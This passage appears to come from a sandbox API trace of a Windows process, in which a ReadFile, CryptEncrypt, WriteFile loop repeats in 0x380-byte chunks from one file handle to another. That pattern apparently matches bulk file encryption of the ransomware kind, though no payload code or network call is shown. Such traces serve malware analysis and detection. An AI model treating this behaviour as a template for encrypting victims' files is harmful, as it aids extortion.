pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.622] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.622] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.623] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.623] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.623] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.623] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.623] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.624] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.624] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.624] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.624] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.624] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.624] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.625] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.625] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.625] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.625] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.625] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.626] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.626] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.626] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.626] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.626] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.627] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.627] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.627] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.627] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.628] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.628] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.628] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.628] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.628] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.629] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.629] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.629] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.629] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.629] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.630] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.630] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.630] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.630] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.630] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 